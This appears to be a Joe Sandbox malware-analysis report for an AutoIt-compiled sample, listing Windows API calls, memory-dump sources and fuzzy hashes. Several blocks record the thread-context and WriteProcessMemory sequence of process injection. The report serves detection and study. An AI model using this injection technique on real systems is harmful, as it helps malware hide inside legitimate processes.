• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 1dbd434624a67f3309c80413d734a81e39638dc423ad561fe517fae96cb3c875
• Instruction ID: 3914ffd829d71aebfa3d5a5692fe17a72283ce2836ae9b1dfa614bf76b6965db
• Opcode Fuzzy Hash: 1dbd434624a67f3309c80413d734a81e39638dc423ad561fe517fae96cb3c875
• Instruction Fuzzy Hash: 572127B5915358EFDB10DF94ED88B9DBBF4FB09700F00411AF610AA2A0D7B44689DF90

Control-flow Graph

APIs
  • Part of subcall function 0089073A: CreateFileW.KERNELBASE(00000000,00000000,?,00890AA4,?,?,00000000,?,00890AA4,00000000,0000000C), ref: 00890757
• GetLastError.KERNEL32 ref: 00890B0F
• __dosmaperr.LIBCMT ref: 00890B16
• GetFileType.KERNELBASE(00000000), ref: 00890B22
• GetLastError.KERNEL32 ref: 00890B2C
• __dosmaperr.LIBCMT ref: 00890B35
• CloseHandle.KERNEL32(00000000), ref: 00890B55
• CloseHandle.KERNEL32(?), ref: 00890C9F
• GetLastError.KERNEL32 ref: 00890CD1
• __dosmaperr.LIBCMT ref: 00890CD8
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
• Opcode ID: 70c732c68a804222eed113f807d91025dbacc941ccb55db429acc3113b01a6c0
• Instruction ID: 93da597b545e7f44c113aa2e2b65206eaee5960782b864c0eaa7379b8b6074b4
• Opcode Fuzzy Hash: 70c732c68a804222eed113f807d91025dbacc941ccb55db429acc3113b01a6c0
• Instruction Fuzzy Hash: 15A13532A142588FDF19EF68D852BAD3BA0FB16324F180159F815DB391D7319912DF92

Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00894B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00855539
                                                                                                                                                                              • Part of subcall function 008551BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008551E1
                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0085534B
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00894BD7
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00894C18
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00894C5A
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00894CC1
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00894CD0
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                            • API String ID: 98802146-2727554177
                                                                                                                                                                            • Opcode ID: 2375fe27785d6ace6d8300393206549534232963f7ed6ac7998c64b0261d59f1
                                                                                                                                                                            • Instruction ID: 197a863ec8a7d859236955ff6cac0fa3d1d2b82f5ac954b76b80079253043082
                                                                                                                                                                            • Opcode Fuzzy Hash: 2375fe27785d6ace6d8300393206549534232963f7ed6ac7998c64b0261d59f1
                                                                                                                                                                            • Instruction Fuzzy Hash: 2E717E715183009EC720EF69EC8199BBBE8FF99350F80442DF845C72A1EB759B4ADB52

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00853465
• LoadCursorW.USER32(00000000,00007F00), ref: 00853474
• LoadIconW.USER32(00000063), ref: 0085348A
• LoadIconW.USER32(000000A4), ref: 0085349C
• LoadIconW.USER32(000000A2), ref: 008534AE
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008534C6
• RegisterClassExW.USER32(?), ref: 00853517
  • Part of subcall function 008535AB: GetSysColorBrush.USER32(0000000F), ref: 008535DE
  • Part of subcall function 008535AB: RegisterClassExW.USER32(00000030), ref: 00853608
  • Part of subcall function 008535AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00853619
  • Part of subcall function 008535AB: InitCommonControlsEx.COMCTL32(?), ref: 00853636
  • Part of subcall function 008535AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00853646
  • Part of subcall function 008535AB: LoadIconW.USER32(000000A9), ref: 0085365C
  • Part of subcall function 008535AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0085366B
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: 90d9c6af47d4282789a26bb0fe12ae82f1e4fe3cb3be7796285fee0a87b1394b
• Instruction ID: 2adf2bdce4c6027e4ffc83bcb86c88a64332dae56d5f09ea354bac661d131baf
• Opcode Fuzzy Hash: 90d9c6af47d4282789a26bb0fe12ae82f1e4fe3cb3be7796285fee0a87b1394b
• Instruction Fuzzy Hash: FD214FB0D24354BBDB20DFA5EC95A997FF4FB0CB50F00401AF604AA2A0D3B9455AAF90

Control-flow Graph

APIs
  • Part of subcall function 00857953: CloseHandle.KERNELBASE(?,?,00000000,00893A1C), ref: 00857973
  • Part of subcall function 00856E52: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00853B33,?,00008000), ref: 00856E80
• SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00853C17
• _wcslen.LIBCMT ref: 00853C96
• SetCurrentDirectoryW.KERNEL32(?), ref: 00853D81
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: CurrentDirectory$CloseCreateFileHandle_wcslen
• String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
• API String ID: 3350465876-3738523708
• Opcode ID: f9ef43163de6f3a0c4adb49ebd3b52fb8728f81a3445f872f435504f990136ab
• Instruction ID: 2d0bd931b909ed373faddba5c73556ee4e8e61a19820a29e3f5da43c2ca908f7
• Opcode Fuzzy Hash: f9ef43163de6f3a0c4adb49ebd3b52fb8728f81a3445f872f435504f990136ab
• Instruction Fuzzy Hash: A02256701083449BCB24EF68C881AAEBBE5FF95355F04491DF886D72A2DB709A49CB53

Control-flow Graph

APIs
• DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00853690,?,?), ref: 008536FE
• KillTimer.USER32(?,00000001,?,?,?,?,?,00853690,?,?), ref: 0085372A
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0085374D
• RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00853690,?,?), ref: 00853758
• CreatePopupMenu.USER32 ref: 0085376C
• PostQuitMessage.USER32(00000000), ref: 0085378D
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated
• API String ID: 129472671-2362178303
• Opcode ID: d96e2a2fc591ec128e359513519ba32f0713c2e8929eab707e82a81765072160
• Instruction ID: 8a8dc6059c8bc34dd9e555d5dbad5e168398e951fadf33d0e0d344910781b675
• Opcode Fuzzy Hash: d96e2a2fc591ec128e359513519ba32f0713c2e8929eab707e82a81765072160
• Instruction Fuzzy Hash: DE4179B4518244BBDB346B38DC4AB793A95F709392F044138FD11CA2A5CB749F4DA762

                                                                                                                                                                             Control-flow Graph
                                                                                                                                                                             • Rendered graph (executed / not-executed basic blocks) not reproduced. Blocks span 852a52-852d5c and 8939f4-893bb3; API calls reached in the graph: mciSendStringW, DestroyWindow, UnregisterHotKey, FindClose, FreeLibrary, VirtualFree, CoUninitialize.
                                                                                                                                                                            APIs
                                                                                                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00852A9B
                                                                                                                                                                            • CoUninitialize.COMBASE ref: 00852B3A
                                                                                                                                                                            • UnregisterHotKey.USER32(?), ref: 00852D1F
                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 008939F5
                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00893A5A
                                                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00893A87
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                             • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                            • String ID: close all
                                                                                                                                                                            • API String ID: 469580280-3243417748
                                                                                                                                                                            • Opcode ID: cf965a12653ed88eb7d4b87cd158513914a56c45aa62fc271d45c9b2ecf7c049
                                                                                                                                                                            • Instruction ID: 7de6af490814ce4c61df219a5301dce4856754a6b9fc8ab971e2992839c965f4
                                                                                                                                                                            • Opcode Fuzzy Hash: cf965a12653ed88eb7d4b87cd158513914a56c45aa62fc271d45c9b2ecf7c049
                                                                                                                                                                            • Instruction Fuzzy Hash: 00D14A31701222CFCB19EF19C895A29F7A0FF06715F1441ADE94AEB252CB31AD1ACF91

                                                                                                                                                                             Control-flow Graph
                                                                                                                                                                             • Rendered graph (executed / not-executed basic blocks) not reproduced. Blocks span 8c874a-8c8a0c; API calls reached in the graph: GetCurrentDirectoryW, SetCurrentDirectoryW, GetFileAttributesW, SetFileAttributesW.
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008C8907
                                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?), ref: 008C891B
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 008C8945
                                                                                                                                                                            • SetFileAttributesW.KERNELBASE(?,00000000), ref: 008C895F
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 008C8971
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 008C89BA
                                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?), ref: 008C8A0A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                             • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                            • API String ID: 769691225-438819550
                                                                                                                                                                            • Opcode ID: 16f91a548e6a3096c6171a5f771e258e4025d86bc50c42366dbee464a5008891
                                                                                                                                                                            • Instruction ID: 918a59fd9daca6ad16457b92437e9e54c3f99c9829be92c7cbb49f25492713dd
                                                                                                                                                                            • Opcode Fuzzy Hash: 16f91a548e6a3096c6171a5f771e258e4025d86bc50c42366dbee464a5008891
                                                                                                                                                                            • Instruction Fuzzy Hash: 99819D72544304DBCB20EF58C494EAAB7F8FB98311F54882EF885D7251EB34D949CB92

                                                                                                                                                                             Control-flow Graph
                                                                                                                                                                             • Rendered graph (executed / not-executed basic blocks) not reproduced. Blocks span 8890d5-889489; API calls reached in the graph: GetConsoleMode, ReadConsoleW, ReadFile, GetLastError.
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                             • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d537300827b2ac7fa6a365562e774f0a45249a20893bb18b206e6c09b2bb48df
                                                                                                                                                                            • Instruction ID: ea848cf6c5a00df1c1f294e447acb8f3a6e85fd20207905676a040faba3a20a3
                                                                                                                                                                            • Opcode Fuzzy Hash: d537300827b2ac7fa6a365562e774f0a45249a20893bb18b206e6c09b2bb48df
                                                                                                                                                                            • Instruction Fuzzy Hash: 69C1E370A04249AFDB11EFACD845BBDBBB4FF19310F184199E9A4E7392C7349942CB61
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00853568
                                                                                                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00853589
                                                                                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,008532EF,?), ref: 0085359D
                                                                                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,008532EF,?), ref: 008535A6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                             • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$CreateShow
                                                                                                                                                                            • String ID: AutoIt v3$edit
                                                                                                                                                                            • API String ID: 1584632944-3779509399
APIs
• LoadLibraryA.KERNEL32 ref: 008AE72B
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 008AE73D
• FreeLibrary.KERNEL32(00000000), ref: 008AE763
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: GetSystemWow64DirectoryW$X64
• API String ID: 145871493-2590602151
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,008555EB,SwapMouseButtons,00000004,?), ref: 0085561C
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,008555EB,SwapMouseButtons,00000004,?), ref: 0085563D
• RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,008555EB,SwapMouseButtons,00000004,?), ref: 0085565F
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
Strings
• Variable must be of type 'Object'., xrefs: 008A486A
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID:
• String ID: Variable must be of type 'Object'.
• API String ID: 0-109567571
APIs
• Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,?,D83D6AA1,00000000,?,?,?,00000000), ref: 0119504D
• WriteProcessMemory.KERNELBASE(?,00000000,00000000), ref: 01195099
• Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 011950E4
• ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 01195104
Memory Dump Source
• Source File: 00000007.00000003.1626317205.0000000001193000.00000004.00000020.00020000.00000000.sdmp, Offset: 01142000, based on PE: false
• Associated: 00000007.00000003.1602090695.0000000001142000.00000004.00000020.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_3_10fc000_dmqiuorkt.jbxd
Similarity
• API ID: Thread$ContextWow64$MemoryProcessResumeWrite
• String ID:
• API String ID: 3157728184-0
APIs
• Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,?,D83D6AA1,00000000,?,?,?,00000000), ref: 0119504D
• WriteProcessMemory.KERNELBASE(?,00000000,00000000), ref: 01195099
• Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 011950E4
• ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 01195104
Memory Dump Source
• Source File: 00000007.00000003.1626317205.0000000001193000.00000004.00000020.00020000.00000000.sdmp, Offset: 010FC000, based on PE: false
• Associated: 00000007.00000003.1602038320.00000000010FC000.00000004.00000020.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_3_10fc000_dmqiuorkt.jbxd
Similarity
• API ID: Thread$ContextWow64$MemoryProcessResumeWrite
• String ID:
• API String ID: 3157728184-0
APIs
• Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,?,D83D6AA1,00000000,?,?,?,00000000), ref: 0119504D
• WriteProcessMemory.KERNELBASE(?,00000000,00000000), ref: 01195099
• Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 011950E4
• ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 01195104
Memory Dump Source
• Source File: 00000007.00000003.1626317205.0000000001193000.00000004.00000020.00020000.00000000.sdmp, Offset: 0118B000, based on PE: false
• Associated: 00000007.00000003.1624407271.000000000118A000.00000004.00000020.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_3_10fc000_dmqiuorkt.jbxd
Similarity
• API ID: Thread$ContextWow64$MemoryProcessResumeWrite
• String ID:
• API String ID: 3157728184-0
APIs
• Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,?,D83D6AA1,00000000,?,?,?,00000000), ref: 0119504D
• WriteProcessMemory.KERNELBASE(?,00000000,00000000), ref: 01195099
• Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 011950E4
• ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 01195104
Memory Dump Source
• Source File: 00000007.00000003.1626317205.0000000001193000.00000004.00000020.00020000.00000000.sdmp, Offset: 0118A000, based on PE: false
• Associated: 00000007.00000003.1624407271.000000000118A000.00000004.00000020.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_3_10fc000_dmqiuorkt.jbxd
Similarity
• API ID: Thread$ContextWow64$MemoryProcessResumeWrite
• String ID:
• API String ID: 3157728184-0
                                                                                                                                                                            • Opcode ID: 8f1ffb96e6e417cca4a8ad9690f0aa8d41597e7873cb9d6b2e4e3da244202727
                                                                                                                                                                            • Instruction ID: f0065fffc5f78fa7cff088d282f2b56f83ff3b160fac57084b5a74902e79251d
                                                                                                                                                                            • Opcode Fuzzy Hash: 8f1ffb96e6e417cca4a8ad9690f0aa8d41597e7873cb9d6b2e4e3da244202727
                                                                                                                                                                            • Instruction Fuzzy Hash: C741F0B07D02017FDB4EABB0CC42F397726AF66708F2440EAA6646F1E1DB625811C661
                                                                                                                                                                            APIs
                                                                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,?,D83D6AA1,00000000,?,?,?,00000000), ref: 0119504D
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,00000000), ref: 01195099
                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 011950E4
                                                                                                                                                                            • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 01195104
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000003.1626317205.0000000001193000.00000004.00000020.00020000.00000000.sdmp, Offset: 01193000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_3_10fc000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Thread$ContextWow64$MemoryProcessResumeWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3157728184-0
                                                                                                                                                                            • Opcode ID: 6cb7b0c944d230534f36a00f08c8c21c5c457225fa25408c126426058f5612c4
                                                                                                                                                                            • Instruction ID: f0065fffc5f78fa7cff088d282f2b56f83ff3b160fac57084b5a74902e79251d
                                                                                                                                                                            • Opcode Fuzzy Hash: 6cb7b0c944d230534f36a00f08c8c21c5c457225fa25408c126426058f5612c4
